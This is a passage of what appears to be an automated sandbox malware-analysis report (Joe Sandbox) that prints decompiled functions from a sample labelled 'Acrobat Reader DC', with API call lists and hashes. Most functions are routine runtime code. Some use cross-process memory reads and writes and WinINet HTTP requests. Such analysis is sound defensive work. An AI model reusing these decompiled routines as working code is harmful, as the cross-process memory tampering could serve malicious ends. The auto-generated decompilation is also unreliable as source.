					if(_t11 == 0xfffffffe) {
						goto L14;
					}
					return SelectObject(_t25, E00441432(_t22, _t35, _t11, 0));
				}
				_t27 =  *0x4a86f4 - _t24; // 0x0
				if(_t27 != 0) {
					L4:
					_t14 =  *0x4a86e4; // 0x0
					if(_t14 != 0) {
						DeleteObject(_t14);
						 *0x4a86e4 = 0;
					}
					 *0x4a86f0 = _t23;
					 *0x4a86f4 = _t24;
					 *0x4a86f8 = _t21;
					_v16.lbStyle = 0;
					_v16.lbColor = _t24;
					_v16.lbHatch = 0;
					if(_t23 != 1) {
						_t21 = _t21 | 0x00010000;
					}
					_t17 = ExtCreatePen(_t21, _t23,  &_v16, 0, 0);
					_t25 = _a4;
					 *0x4a86e4 = _t17;
					 *0x4a86e8 = SelectObject(_t25, _t17);
					if( *0x4a86ec == 0) {
						BeginPath(_t25);
						 *0x4a86ec = 1;
					}
					goto L11;
				}
				_t28 =  *0x4a86f0 - _t23; // 0x0
				if(_t28 != 0) {
					goto L4;
				}
				_t29 =  *0x4a86f8 - _t21; // 0x0
				if(_t29 == 0) {
					goto L10;
				}
				goto L4;
			}















                                  0x004471a2
                                  0x004471a6
                                  0x004471aa
                                  0x004471b0
                                  0x0044724c
                                  0x0044724c
                                  0x0044724f
                                  0x0044724f
                                  0x00447255
                                  0x00447272
                                  0x00447272
                                  0x00447272
                                  0x00447257
                                  0x0044725a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00447266
                                  0x004471b6
                                  0x004471bc
                                  0x004471ce
                                  0x004471ce
                                  0x004471d5
                                  0x004471d8
                                  0x004471de
                                  0x004471de
                                  0x004471ea
                                  0x004471f0
                                  0x004471f6
                                  0x004471fc
                                  0x004471ff
                                  0x00447202
                                  0x00447208
                                  0x0044720a
                                  0x0044720a
                                  0x00447218
                                  0x0044721e
                                  0x00447223
                                  0x00447235
                                  0x0044723a
                                  0x0044723d
                                  0x00447243
                                  0x00447243
                                  0x00000000
                                  0x0044723a
                                  0x004471be
                                  0x004471c4
                                  0x00000000
                                  0x00000000
                                  0x004471c6
                                  0x004471cc
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                  • BeginPath.GDI32(?), ref: 0044723D
                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Object$Select$BeginCreateDeletePath
                                  • String ID:
                                  • API String ID: 2338827641-0
                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00434582(int __eax, long long __fp0, long _a4) {
				intOrPtr _v8;
				union _LARGE_INTEGER _v12;
				union _LARGE_INTEGER _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long long _v36;
				long long _v44;
				signed char _t17;
				long _t25;
				long _t26;

				_t27 = __fp0;
				_t13 = __eax;
				_t25 = _a4;
				_t26 = _t25;
				if(_t26 < 0) {
					return __eax;
				} else {
					if(_t26 != 0) {
						if(_t25 >= 0xf) {
							L10:
							Sleep(_t25);
							return _t13;
						}
						_t13 = QueryPerformanceCounter( &_v20);
						if(_t13 == 0) {
							goto L10;
						}
						_a4 = _t25;
						asm("fild dword [ebp+0x8]");
						if(_t25 < 0) {
							_t27 = __fp0 +  *0x48cd18;
						}
						_v44 = _t27;
						do {
							Sleep(0);
							QueryPerformanceCounter( &_v12);
							asm("sbb eax, [ebp-0xc]");
							_v28 = _v12.LowPart - _v20.LowPart;
							_v24 = _v8;
							asm("fild qword [ebp-0x18]");
							_v36 = _t27;
							_t17 = E0040DBD0(_v8);
							asm("fdivr qword [ebp-0x20]");
							asm("fcomp qword [ebp-0x28]");
							asm("fnstsw ax");
						} while ((_t17 & 0x00000005) != 0);
						return _t17;
					} else {
						Sleep(0);
						return _t13;
					}
				}
			}













                                  0x00434582
                                  0x00434582
                                  0x00434589
                                  0x0043458c
                                  0x0043458e
                                  0x0043461e
                                  0x00434594
                                  0x00434594
                                  0x004345a9
                                  0x00434612
                                  0x00434613
                                  0x00000000
                                  0x00434619
                                  0x004345b5
                                  0x004345b9
                                  0x00000000
                                  0x00000000
                                  0x004345bb
                                  0x004345be
                                  0x004345c3
                                  0x004345c5
                                  0x004345c5
                                  0x004345cb
                                  0x004345d2
                                  0x004345d4
                                  0x004345de
                                  0x004345e9
                                  0x004345ec
                                  0x004345ef
                                  0x004345f2
                                  0x004345f5
                                  0x004345f8
                                  0x004345fd
                                  0x00434600
                                  0x00434603
                                  0x00434605
                                  0x0043460f
                                  0x00434596
                                  0x00434598
                                  0x004345a2
                                  0x004345a2
                                  0x00434594

                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CounterPerformanceQuerySleep
                                  • String ID:
                                  • API String ID: 2875609808-0
                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042FD29(struct HDC__* _a4, intOrPtr _a8) {
				void* _t3;
				void* _t5;
				int _t6;
				intOrPtr _t10;
				struct HDC__* _t11;

				_t11 = _a4;
				_t10 = _a8;
				if( *0x4a86ec != 0) {
					EndPath(_t11);
					 *0x4a86ec = 0;
					if(_t10 == 0xffffffff || _t10 == 0xfffffffe) {
						StrokePath(_t11);
					} else {
						StrokeAndFillPath(_t11);
					}
				}
				_t3 =  *0x4a86e8; // 0x0
				if(_t3 == 0) {
					return _t3;
				} else {
					SelectObject(_t11, _t3);
					_t5 =  *0x4a86e4; // 0x0
					 *0x4a86e8 = 0;
					_t6 = DeleteObject(_t5);
					 *0x4a86e4 = 0;
					 *0x4a86f4 = 0xffffffff;
					return _t6;
				}
			}








                                  0x0042fd34
                                  0x0042fd38
                                  0x0042fd3b
                                  0x0042fd3e
                                  0x0042fd44
                                  0x0042fd4e
                                  0x0042fd5f
                                  0x0042fd55
                                  0x0042fd56
                                  0x0042fd56
                                  0x0042fd4e
                                  0x0042fd65
                                  0x0042fd6c
                                  0x0042fda3
                                  0x0042fd6e
                                  0x0042fd70
                                  0x0042fd76
                                  0x0042fd7c
                                  0x0042fd86
                                  0x0042fd8c
                                  0x0042fd96
                                  0x00000000
                                  0x0042fd96

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                  • String ID:
                                  • API String ID: 2625713937-0
                                  • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                  • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                  • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                  • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00417803(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x48d128);
				E00416C70(__ebx, __edi, __esi);
				_t28 = E00417A69(__ebx, _t31);
				_t12 =  *0x490800; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E004182CB(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E004177B6(_t29,  *0x490a48);
					 *(_t30 - 4) = 0xfffffffe;
					E00417870();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00417A69(_t20, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E00411924(_t25, _t34);
				}
				return E00416CB5(_t29);
			}









                                  0x00417803
                                  0x00417803
                                  0x00417803
                                  0x00417803
                                  0x00417803
                                  0x00417805
                                  0x0041780a
                                  0x00417814
                                  0x00417816
                                  0x0041781e
                                  0x00417842
                                  0x00417844
                                  0x0041784a
                                  0x00417854
                                  0x0041785f
                                  0x00417862
                                  0x00417869
                                  0x00417820
                                  0x00417820
                                  0x00417824
                                  0x00000000
                                  0x00417826
                                  0x0041782b
                                  0x0041782b
                                  0x00417824
                                  0x0041782e
                                  0x00417830
                                  0x00417832
                                  0x00417834
                                  0x00417839
                                  0x00417841

                                  APIs
                                  • __getptd.LIBCMT ref: 0041780F
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __getptd.LIBCMT ref: 00417826
                                  • __amsg_exit.LIBCMT ref: 00417834
                                  • __lock.LIBCMT ref: 00417844
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                  • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                  • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                  • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E0043659E(struct HWND__** _a4, char _a8, intOrPtr* _a12) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				char _v168;
				void* __edi;
				intOrPtr _t58;
				struct HWND__** _t83;
				struct HWND__* _t95;
				char* _t100;
				struct HWND__** _t101;
				long _t106;
				long _t107;

				_t83 = _a4;
				E00410620( &_v168);
				_v24 = _a8;
				_t106 = E004343AD( &_v168, 0x10,  *_t83);
				E00434319( &_v168,  &_v24, _t106, 0x10);
				_t95 =  *_t83;
				SendMessageW(_t95, 0x1104, 0, _t106);
				E004342DD( &_v168, _t106,  &_v24, 0x10);
				_t101 = _v24;
				asm("cdq");
				_t58 = (_v12 - _v20 - _t95 >> 1) + _v20;
				 *((intOrPtr*)(_a12 + 4)) = _t58;
				_v36 = _t58;
				_t107 = E004343AD( &_v168, 0x10,  *_t83);
				if(_t101 > _v16) {
					L6:
					E00410640( &_v168);
					return 0;
				} else {
					while(1) {
						_v40 = _t101;
						E00434319( &_v168,  &_v40, _t107, 0x10);
						SendMessageW( *_t83, 0x1111, 0, _t107);
						E004342DD( &_v168, _t107,  &_v40, 0x10);
						if((_v32 & 0x00000040) != 0) {
							break;
						}
						_t101 = _t101 + 1;
						if(_t101 <= _v16) {
							continue;
						} else {
							E00410640( &_v168);
							return 0;
						}
						goto L13;
					}
					if(_t101 <= _v16) {
						_a4 = _t101;
						while(1) {
							_v40 = _t101;
							E00434319( &_v168,  &_v40, _t107, 0x10);
							SendMessageW( *_t83, 0x1111, 0, _t107);
							_t100 =  &_v168;
							E004342DD(_t100, _t107,  &_v40, 0x10);
							if((_v32 & 0x00000040) == 0) {
								break;
							}
							_t101 = _t101 + 1;
							if(_t101 <= _v16) {
								continue;
							} else {
								E00410640( &_v168);
								return 0;
							}
							goto L13;
						}
						if(_t101 > _v16) {
							goto L6;
						} else {
							asm("cdq");
							 *_a12 = _a4 + (_t101 - _a4 - _t100 >> 1);
							E00410640( &_v168);
							return 1;
						}
					} else {
						goto L6;
					}
				}
				L13:
			}



















                                  0x004365a8
                                  0x004365b3
                                  0x004365c7
                                  0x004365d1
                                  0x004365df
                                  0x004365e4
                                  0x004365ef
                                  0x00436603
                                  0x0043660e
                                  0x00436613
                                  0x0043661b
                                  0x0043661d
                                  0x00436620
                                  0x00436634
                                  0x00436639
                                  0x0043669f
                                  0x004366a5
                                  0x004366b2
                                  0x0043663e
                                  0x0043663e
                                  0x0043664c
                                  0x0043664f
                                  0x0043665f
                                  0x00436673
                                  0x0043667c
                                  0x00000000
                                  0x00000000
                                  0x0043667e
                                  0x00436682
                                  0x00000000
                                  0x00436684
                                  0x0043668a
                                  0x00436697
                                  0x00436697
                                  0x00000000
                                  0x00436682
                                  0x0043669d
                                  0x004366b5
                                  0x004366be
                                  0x004366cc
                                  0x004366cf
                                  0x004366df
                                  0x004366ec
                                  0x004366f3
                                  0x004366fc
                                  0x00000000
                                  0x00000000
                                  0x004366fe
                                  0x00436702
                                  0x00000000
                                  0x00436704
                                  0x0043670a
                                  0x00436717
                                  0x00436717
                                  0x00000000
                                  0x00436702
                                  0x0043671d
                                  0x00000000
                                  0x0043671f
                                  0x00436726
                                  0x00436736
                                  0x00436738
                                  0x00436745
                                  0x00436745
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043669d
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                  • String ID: @
                                  • API String ID: 4150878124-2766056989
                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044A856(long _a4, long _a8, char _a12) {
				intOrPtr _v12;
				void* _v16;
				char _v48;
				void* _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				void* _t55;
				void* _t57;
				long _t58;

				_t58 = _a4;
				_t57 = InternetOpenUrlW( *(_t58 + 4),  *(_t58 + 0x20), 0, 0,  *(_t58 + 0x54) & 0x80000000, 0);
				_v16 = _t57;
				_v12 = InternetCloseHandle;
				if(_t57 != 0) {
					E00442516(_t58, _t57, _a8);
					if(HttpSendRequestW(_t57, 0, 0, 0, 0) == 0 || E004318EB(_t57) != 0xc8) {
						_t26 = E004422CB(_t58, 0x2a, 0xdeadbeef, 0);
						E00431861( &_v16);
						return _t26;
					} else {
						_t55 =  &_v48;
						_a4 = 0;
						_a8 = 0x20;
						HttpQueryInfoW(_t57, 5, _t55,  &_a8,  &_a4);
						 *((intOrPtr*)(_t58 + 0x10)) = E0041319B( &_v48);
						 *(_t58 + 0x14) = _t55;
						if(_a12 == 0) {
							_t35 = E004422CB(_t58, 0, 0, 1);
							E00431861( &_v16);
							return _t35;
						} else {
							_t38 = E004424F3(_t58, _t57);
							E00431861( &_v16);
							return _t38;
						}
					}
				} else {
					_t41 = E004422CB(_t58, 0x29, 0xdeadbeef, _t57);
					E00431861( &_v16);
					return _t41;
				}
			}













                                  0x0044a85e
                                  0x0044a880
                                  0x0044a887
                                  0x0044a88a
                                  0x0044a88f
                                  0x0044a8bb
                                  0x0044a8d1
                                  0x0044a968
                                  0x0044a973
                                  0x0044a980
                                  0x0044a8e4
                                  0x0044a8ec
                                  0x0044a8f3
                                  0x0044a8fa
                                  0x0044a901
                                  0x0044a917
                                  0x0044a91a
                                  0x0044a91d
                                  0x0044a943
                                  0x0044a94e
                                  0x0044a95b
                                  0x0044a91f
                                  0x0044a921
                                  0x0044a92c
                                  0x0044a939
                                  0x0044a939
                                  0x0044a91d
                                  0x0044a891
                                  0x0044a89a
                                  0x0044a8a5
                                  0x0044a8b2
                                  0x0044a8b2

                                  APIs
                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                  • String ID:
                                  • API String ID: 3705125965-3916222277
                                  • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                  • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                  • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                  • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00434B02(CHAR* _a4, CHAR* _a8, signed int* _a12) {
				struct HINSTANCE__** _v8;
				struct HINSTANCE__* _v12;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t44;
				struct HINSTANCE__** _t45;
				_Unknown_base(*)()* _t50;
				_Unknown_base(*)()*** _t63;
				_Unknown_base(*)()* _t66;
				CHAR* _t92;
				signed int _t94;

				_t92 = _a4;
				_t44 = LoadLibraryA(_a8);
				_v12 = _t44;
				if(_t44 != 0) {
					_t66 =  *(_t92 + 8);
					_t94 = 0;
					__eflags = _t66;
					if(__eflags != 0) {
						_t63 =  *(_t92 + 4);
						while(1) {
							__eflags =  *( *_t63);
							if(__eflags == 0) {
								goto L6;
							}
							_t94 = _t94 + 1;
							_t63 =  &(_t63[1]);
							__eflags = _t94 - _t66;
							if(__eflags < 0) {
								continue;
							}
							goto L6;
						}
					}
					L6:
					_push(0xc);
					_t45 = E004115D7(_t92, _t94, __eflags);
					_v8 = _t45;
					__eflags = _t94 - _t66;
					if(_t94 != _t66) {
						 *(( *(_t92 + 4))[_t94]) = _t45;
					} else {
						E00436299(_t92,  &_v8);
					}
					 *( *(( *(_t92 + 4))[_t94])) = _v12;
					_t50 = GetProcAddress( *( *(( *(_t92 + 4))[_t94])), "AU3_GetPluginDetails");
					__eflags = _t50;
					if(_t50 != 0) {
						_a4 = 0;
						_a8 = 0;
						 *_t50( &_a4,  &_a8);
						( *(( *(_t92 + 4))[_t94]))[1] = _a4;
						 *_a12 = _t94;
						( *(( *(_t92 + 4))[_t94]))[2] = _a8;
						__eflags = 0;
						return 0;
					} else {
						FreeLibrary( *( *(( *(_t92 + 4))[_t94])));
						_push( *(( *(_t92 + 4))[_t94]));
						E004111DC();
						 *(( *(_t92 + 4))[_t94]) = 0;
						return 3;
					}
				} else {
					return 3;
				}
			}














                                  0x00434b0c
                                  0x00434b10
                                  0x00434b16
                                  0x00434b1b
                                  0x00434b2a
                                  0x00434b2e
                                  0x00434b30
                                  0x00434b32
                                  0x00434b34
                                  0x00434b37
                                  0x00434b39
                                  0x00434b3c
                                  0x00000000
                                  0x00000000
                                  0x00434b3e
                                  0x00434b3f
                                  0x00434b42
                                  0x00434b44
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00434b44
                                  0x00434b37
                                  0x00434b46
                                  0x00434b46
                                  0x00434b48
                                  0x00434b50
                                  0x00434b53
                                  0x00434b55
                                  0x00434b69
                                  0x00434b57
                                  0x00434b5c
                                  0x00434b5c
                                  0x00434b76
                                  0x00434b88
                                  0x00434b90
                                  0x00434b92
                                  0x00434bd2
                                  0x00434bd5
                                  0x00434bd8
                                  0x00434be5
                                  0x00434bf9
                                  0x00434bfd
                                  0x00434c00
                                  0x00434c06
                                  0x00434b94
                                  0x00434b9f
                                  0x00434bad
                                  0x00434bae
                                  0x00434bbc
                                  0x00434bc7
                                  0x00434bc7
                                  0x00434b1d
                                  0x00434b26
                                  0x00434b26

                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
